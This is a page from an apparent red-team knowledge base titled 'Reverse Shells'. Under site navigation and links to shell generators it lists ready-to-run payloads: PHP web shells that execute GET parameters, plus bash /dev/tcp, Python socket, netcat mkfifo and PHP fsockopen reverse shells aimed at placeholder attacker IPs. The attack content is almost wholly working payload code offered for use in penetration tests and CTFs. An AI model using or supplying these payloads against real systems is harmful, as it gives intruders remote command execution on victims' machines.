Red Squad
search
⌘Ctrlk
BuyMeACoffee
Red Squad
  • 🏠/home/red-squad
  • 🌐Web Hacking
    • 🚩CTFs shortcuts
    • 🗺️Audits plan
    • 🕵️OSINT
    • calculatorEnumeration
    • 🔗HTTP Stuff
    • 🔐Sessions / Tokens
    • 💉Injections
    • 🪱Web Vulnerabilities
    • ⛔WAF Bypass
    • ✍️Servers / CMS
    • 🖇️API
  • 🐧Linux Hacking
    • 🧗Privilege Escalation
    • 👣Cover tracks
    • 🚪Backdoors
    • ⭕Reverse Shells
      • Shell Stabilizing
      • PwnCat
      • Ping-Pong
    • 🔢Compiled Binaries
    • 🌊Buffer Overflow
    • 🐳Docker Escape
    • 🤝File sharing
  • 🪟Windows Hacking
    • 👥Active Directory
    • 💡Useful AD Commands
    • 🧗Privilege Escalation
    • 🐚Shells
    • 🔓Bypasses
    • 📃Office
    • 👩‍💻SCCM | MECM
    • 💎Microsoft 365
  • 💽Systems
    • 🐕‍🦺Services Enumeration
    • 🖨️Printers
    • 🛡️Fortinet
    • 📹CCTV / IP Cameras
  • 🎆Networks
    • 🌪️Pivoting
    • 🔥Firewalls
    • 🔗Proxies
  • 📱Mobile Hacking
    • 🤖Android
    • 🍏iOS
    • 📺IOT
  • Configuration
    • ChromeOS
    • Mobile
    • IBM
  • 📡Wireless Hacking
    • 🎆Wi-Fi Attacks
    • 🫐Bluetooth
  • 👨‍💻Code Audit
    • ✔️Best Practices
    • ❌Bad Practices
    • ⚒️Tools
  • 🍑Thick Client Hacking
    • 📝Thick Client Pentesting Methodology
    • 🗄️Resources
  • 🗄️MISC
    • 🔑Default Credentials
    • 🔻CVEs
    • 🦊Browser Extensions
    • 🤖AI
    • 🔭Hacking Labs
    • 🔫Exploitation Frameworks
  • 🕵️OPSEC
    • 🗝️Privacy
  • 🔑CRACKING | ENCODING
    • 🥊Bruteforce tools
    • 📝Wordlists
    • 🧨Cracking Tools
    • 🔬Encoding | Decoding Tools
    • 🔍Steganography | Cipher
  • 🔴RED TEAM
    • 📥Password Extract
    • 🕵️Spy cam
    • 🔒Lock Picking
    • 🎣Phishing
  • 🌀Whistle Blowing
    • 📹CCTV
  • 🔵BLUE TEAM
    • 🧩Forensics
    • 🦹Malware Analysis
    • 🛠️Tools
    • 🍯HoneyPots
    • 🎆Networks Security
    • 🪙Online IoC Scanners
  • 🐞Bug Bounty Related
    • Searching for CVEs
    • [FR] Legal
    • Dorks
  • 🖥️DEVELOPERS
    • 👨‍💻IDE
  • 📚LEARNING
    • Windows
    • SQL
    • SSL/TLS
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
githubEdit
  1. 🐧Linux Hacking

⭕Reverse Shells

hashtag
List

LogoPayloadsAllTheThings/Methodology and Resources/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThingsGitHubchevron-right
Reverse Shell List

hashtag
Reverse Shell Online Generators

Host locally :

LogoGitHub - 0dayCTF/reverse-shell-generator: Hosted Reverse Shell generator with a ton of functionality. -- (Great for CTFs)GitHubchevron-right
LogoOnline - Reverse Shell Generatorwww.revshells.comchevron-right
Reverse Shell Cheat Sheetpentestmonkeychevron-right

hashtag
PHP Payloads

hashtag
Bash TCP

hashtag
Python

hashtag
Netcat

hashtag
PHP

PreviousBackdoorschevron-leftNextShell Stabilizingchevron-right

Last updated 2 years ago

  • List
  • Reverse Shell Online Generators
<?php phpinfo(); ?>
<?php system('id'); ?>
<?php system($_GET[‘cmd’]); ?> //in user-agent
bash -i >& /dev/tcp/0.0.0.0/8899 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'